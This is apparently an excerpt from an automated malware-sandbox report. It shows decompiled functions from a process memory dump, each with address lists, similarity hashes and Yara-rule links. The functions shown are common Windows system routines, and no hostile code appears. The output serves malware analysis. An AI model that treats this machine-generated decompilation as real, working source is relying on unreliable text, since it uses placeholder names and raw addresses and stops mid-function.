                                                        0x048a0fa2
                                                        0x048a0fa9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048a0fa9
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `
                                                        • API String ID: 0-2679148245
                                                        • Opcode ID: e330c529d4391ce251de69b0ac4850ea2b5ddfd10551f1468954fd4d15a2cb31
                                                        • Instruction ID: 932d541391ed0d2842233d8dafc92e0594923eac026f3e1071c157640bbe4600
                                                        • Opcode Fuzzy Hash: e330c529d4391ce251de69b0ac4850ea2b5ddfd10551f1468954fd4d15a2cb31
                                                        • Instruction Fuzzy Hash: 4551AC712083419FE724EF28D988B1BB7E5EB84718F044E2CF996D7290D6B0F815C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E0480F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E047F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04819830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04819990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E048195D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x661ce81a
							_t109 = L047F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000661c
								E0481F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000661c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E048195D0();
										L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                        0x0480f0d3
                                                        0x0480f0d9
                                                        0x0480f0e0
                                                        0x0480f0e7
                                                        0x0480f0f2
                                                        0x0480f0f4
                                                        0x0480f0f8
                                                        0x0480f100
                                                        0x0480f108
                                                        0x0480f10d
                                                        0x0480f115
                                                        0x0480f116
                                                        0x0480f11f
                                                        0x0480f123
                                                        0x0480f124
                                                        0x0480f12c
                                                        0x0480f130
                                                        0x0480f134
                                                        0x0480f13d
                                                        0x0480f144
                                                        0x0480f14b
                                                        0x0480f152
                                                        0x0484bab0
                                                        0x0484bab0
                                                        0x0480f158
                                                        0x0480f158
                                                        0x0480f15a
                                                        0x0480f160
                                                        0x0480f165
                                                        0x0480f166
                                                        0x0480f16f
                                                        0x0480f173
                                                        0x0484baa7
                                                        0x0484baa7
                                                        0x0484baab
                                                        0x00000000
                                                        0x0480f179
                                                        0x0480f179
                                                        0x0480f18d
                                                        0x0480f191
                                                        0x0484baa2
                                                        0x00000000
                                                        0x0480f197
                                                        0x0480f19b
                                                        0x0480f1a2
                                                        0x0480f1a9
                                                        0x0480f1af
                                                        0x0480f1b2
                                                        0x0480f1b6
                                                        0x0480f1b9
                                                        0x0480f1c0
                                                        0x0480f1c4
                                                        0x0480f1d8
                                                        0x0480f1df
                                                        0x0480f1e3
                                                        0x0480f1e6
                                                        0x0480f1eb
                                                        0x0480f1ee
                                                        0x0480f1f4
                                                        0x0480f20f
                                                        0x0484bab7
                                                        0x0484babb
                                                        0x0484bacc
                                                        0x0484bad1
                                                        0x0480f215
                                                        0x0480f218
                                                        0x0480f226
                                                        0x0480f22b
                                                        0x00000000
                                                        0x0480f22b
                                                        0x0480f1f6
                                                        0x0480f1f6
                                                        0x0480f1f9
                                                        0x0480f1fb
                                                        0x0480f1fb
                                                        0x0480f1f4
                                                        0x0480f191
                                                        0x0480f173
                                                        0x0480f152
                                                        0x0480f203

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                        • Instruction ID: f6734020810fd27a11e032fabaadcba6f5d60bde174fec195d4a66046a83e31b
                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                        • Instruction Fuzzy Hash: 3B518C712047149FD321DF18C840A67BBF8FF88714F008A2AFA95D76A0E7B4E944CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04853540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E04853540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x48cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04810BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04853706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0481FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04853540;
						E0481FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0482DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04860C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E048197C0();
					}
					return E0481B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04853971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04853884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0481FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04819650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04853787(_a4,  &_v352, _t80);
						}
					}
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E048195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                        0x04853552
                                                        0x0485355a
                                                        0x0485355d
                                                        0x04853566
                                                        0x04853567
                                                        0x0485357e
                                                        0x0485358f
                                                        0x048535a1
                                                        0x048535a5
                                                        0x0485366b
                                                        0x0485366b
                                                        0x0485366d
                                                        0x04853672
                                                        0x04853679
                                                        0x04853685
                                                        0x0485368d
                                                        0x0485369d
                                                        0x048536a7
                                                        0x048536b8
                                                        0x048536c6
                                                        0x048536c7
                                                        0x048536dc
                                                        0x048536e1
                                                        0x048536e7
                                                        0x048536e9
                                                        0x048536e9
                                                        0x04853703
                                                        0x04853703
                                                        0x048535b5
                                                        0x048535c0
                                                        0x048535c4
                                                        0x00000000
                                                        0x00000000
                                                        0x048535ca
                                                        0x048535d7
                                                        0x048535e2
                                                        0x048535e6
                                                        0x048535e8
                                                        0x048535f5
                                                        0x048535fa
                                                        0x04853603
                                                        0x04853604
                                                        0x04853609
                                                        0x0485360a
                                                        0x04853612
                                                        0x04853613
                                                        0x0485361e
                                                        0x04853622
                                                        0x04853628
                                                        0x0485362f
                                                        0x0485362f
                                                        0x04853636
                                                        0x04853638
                                                        0x0485363b
                                                        0x04853642
                                                        0x04853642
                                                        0x04853636
                                                        0x04853657
                                                        0x04853657
                                                        0x0485365c
                                                        0x04853662
                                                        0x04853669
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: BinaryHash
                                                        • API String ID: 2994545307-2202222882
                                                        • Opcode ID: 688a0ad7b5e15903ce2025adc269870a2a5ae45e341323df2426f8b0e9502265
                                                        • Instruction ID: 08a7cbeb26780c0bd091fc560192d52c506512768859ac9d0d25a09c0af48e21
                                                        • Opcode Fuzzy Hash: 688a0ad7b5e15903ce2025adc269870a2a5ae45e341323df2426f8b0e9502265
                                                        • Instruction Fuzzy Hash: FB4133F1D0052C9FEB219A54CC80FDEB77CAB44758F004AA5EE09E7250DB70AE888F95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E048A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E048A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04819730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0489A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0489A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E048A1293(_t79, _v40, E048A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E047F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0489138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                        0x048a05c5
                                                        0x048a05ca
                                                        0x048a05d3
                                                        0x048a06db
                                                        0x048a06db
                                                        0x048a06dd
                                                        0x048a06e3
                                                        0x048a06e3
                                                        0x048a05dd
                                                        0x048a05e7
                                                        0x048a05f6
                                                        0x048a0600
                                                        0x048a0607
                                                        0x048a0610
                                                        0x048a0615
                                                        0x048a061a
                                                        0x048a061c
                                                        0x048a061e
                                                        0x048a0624
                                                        0x048a0625
                                                        0x048a0627
                                                        0x048a0628
                                                        0x048a0631
                                                        0x048a0640
                                                        0x048a064d
                                                        0x048a0654
                                                        0x048a0654
                                                        0x048a0631
                                                        0x048a066d
                                                        0x048a0674
                                                        0x00000000
                                                        0x00000000
                                                        0x048a0692
                                                        0x048a069e
                                                        0x048a06b0
                                                        0x048a06a0
                                                        0x048a06a9
                                                        0x048a06a9
                                                        0x048a06b8
                                                        0x048a06d6
                                                        0x048a06d6
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `
                                                        • API String ID: 0-2679148245
                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                        • Instruction ID: a97d18decbe38aae8122d7bf2aa838f9cb5dde2a7fbce16eb10343738f928741
                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                        • Instruction Fuzzy Hash: BA31F5326047496BF720DE18CD44F9777D9EB85758F084A25F954EB280D7B0F924CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04853884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E04853884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04819650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L047F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04819650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                        0x04853893
                                                        0x04853896
                                                        0x04853899
                                                        0x0485389f
                                                        0x048538a0
                                                        0x048538a4
                                                        0x048538a9
                                                        0x048538ac
                                                        0x048538ad
                                                        0x048538ae
                                                        0x048538af
                                                        0x048538b1
                                                        0x048538b4
                                                        0x048538bb
                                                        0x048538bc
                                                        0x048538bd
                                                        0x048538c4
                                                        0x048538c8
                                                        0x048538ca
                                                        0x048538ca
                                                        0x048538d5
                                                        0x0485393e
                                                        0x04853940
                                                        0x04853942
                                                        0x04853952
                                                        0x04853954
                                                        0x04853961
                                                        0x04853961
                                                        0x04853967
                                                        0x0485396e
                                                        0x0485396e
                                                        0x04853947
                                                        0x0485394c
                                                        0x00000000
                                                        0x0485394c
                                                        0x048538ea
                                                        0x048538ee
                                                        0x048538f8
                                                        0x048538f9
                                                        0x048538ff
                                                        0x04853900
                                                        0x04853902
                                                        0x04853903
                                                        0x0485390b
                                                        0x0485390f
                                                        0x04853950
                                                        0x00000000
                                                        0x04853950
                                                        0x04853915
                                                        0x0485391d
                                                        0x0485391d
                                                        0x04853922
                                                        0x04853926
                                                        0x00000000
                                                        0x04853928
                                                        0x0485392b
                                                        0x0485392b
                                                        0x04853935
                                                        0x04853937
                                                        0x04853937
                                                        0x00000000
                                                        0x04853935
                                                        0x04853926
                                                        0x048538f0
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: BinaryName
                                                        • API String ID: 2994545307-215506332
                                                        • Opcode ID: 96926599e7f5ff76f0057bd43218d42475e7c5cf11231d218e125587d69554f9
                                                        • Instruction ID: 497db114a877a9239d3f1ad41c39ddc23593045fa50494a5b20bd2cbc5a60f06
                                                        • Opcode Fuzzy Hash: 96926599e7f5ff76f0057bd43218d42475e7c5cf11231d218e125587d69554f9
                                                        • Instruction Fuzzy Hash: 4931F4B2900509AFEB26DA58C945E6BF774EF817A0F014629ED15E7760D730BE00C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 33%
                                                        			E0480D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x48cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E047F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0481B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E048198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E048195D0();
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                        0x0480d29c
                                                        0x0480d2a6
                                                        0x0480d2b1
                                                        0x0480d2b5
                                                        0x0480d2b6
                                                        0x0480d2bc
                                                        0x0480d2bd
                                                        0x0480d2be
                                                        0x0480d2bf
                                                        0x0480d2c2
                                                        0x0480d2c4
                                                        0x0480d2cc
                                                        0x0480d384
                                                        0x0480d34b
                                                        0x0480d34f
                                                        0x0480d350
                                                        0x0480d351
                                                        0x0480d35c
                                                        0x0480d35c
                                                        0x0480d2d6
                                                        0x0480d2da
                                                        0x0480d2e1
                                                        0x0480d361
                                                        0x0480d369
                                                        0x0480d36d
                                                        0x0480d2e3
                                                        0x0480d2e3
                                                        0x0480d2e3
                                                        0x0480d2e5
                                                        0x0480d2ed
                                                        0x0480d2f5
                                                        0x0480d2fa
                                                        0x0480d302
                                                        0x0480d303
                                                        0x0480d30b
                                                        0x0480d30f
                                                        0x0480d313
                                                        0x0480d318
                                                        0x0480d31c
                                                        0x0480d320
                                                        0x0480d379
                                                        0x0480d37d
                                                        0x00000000
                                                        0x00000000
                                                        0x0484affe
                                                        0x0484b001
                                                        0x0484b011
                                                        0x00000000
                                                        0x0480d322
                                                        0x0480d322
                                                        0x0480d330
                                                        0x0480d337
                                                        0x0480d35d
                                                        0x0480d339
                                                        0x0480d33f
                                                        0x0480d38c
                                                        0x0480d38c
                                                        0x0480d33f
                                                        0x0480d349
                                                        0x00000000
                                                        0x0480d349

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 6a3988a30dd36eb5cb664116318880b9297121e3057db23c9b42220f8f083bc1
                                                        • Instruction ID: 3102dae6e33560908b64a1a7c5d4313faa3f80e5c425cc144cbb5d573e1c7ff4
                                                        • Opcode Fuzzy Hash: 6a3988a30dd36eb5cb664116318880b9297121e3057db23c9b42220f8f083bc1
                                                        • Instruction Fuzzy Hash: AA318FB26183059FD350DF6CC88096BBBE8EB85658F014E2EF994C3250E638FD04DB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E047E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0481BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0481A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0481A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L047F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                        0x047e1b8f
                                                        0x047e1b9a
                                                        0x047e1b9c
                                                        0x047e1b9e
                                                        0x047e1ba3
                                                        0x04837010
                                                        0x04837010
                                                        0x00000000
                                                        0x047e1ba9
                                                        0x047e1ba9
                                                        0x047e1bae
                                                        0x00000000
                                                        0x047e1bc5
                                                        0x047e1bca
                                                        0x047e1bcf
                                                        0x047e1bd0
                                                        0x047e1bd1
                                                        0x047e1bd2
                                                        0x047e1bd6
                                                        0x047e1bdc
                                                        0x047e1be0
                                                        0x04836ffc
                                                        0x04837000
                                                        0x00000000
                                                        0x04837006
                                                        0x04837009
                                                        0x04837009
                                                        0x047e1be6
                                                        0x047e1bec
                                                        0x047e1c0b
                                                        0x047e1c0b
                                                        0x047e1c0c
                                                        0x047e1c11
                                                        0x047e1c12
                                                        0x047e1c15
                                                        0x047e1c1b
                                                        0x047e1c1f
                                                        0x047e1c31
                                                        0x047e1c33
                                                        0x04837026
                                                        0x04837026
                                                        0x047e1c21
                                                        0x047e1c24
                                                        0x047e1c24
                                                        0x047e1bee
                                                        0x047e1bee
                                                        0x047e1bf2
                                                        0x047e1c3a
                                                        0x047e1bf4
                                                        0x047e1bf4
                                                        0x047e1c05
                                                        0x047e1c05
                                                        0x047e1c09
                                                        0x047e1c3e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047e1c09
                                                        0x047e1bec
                                                        0x047e1be0
                                                        0x047e1bae
                                                        0x047e1c2e

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: WindowsExcludedProcs
                                                        • API String ID: 0-3583428290
                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                        • Instruction ID: 46443a5af056b0e646f3221b05322fa3c724e1763d997d51520420342b6d785f
                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                        • Instruction Fuzzy Hash: 2B210676601518ABDB219A9BC940F6B776CEB48715F054A61B914DB310E630F904D7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047FF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
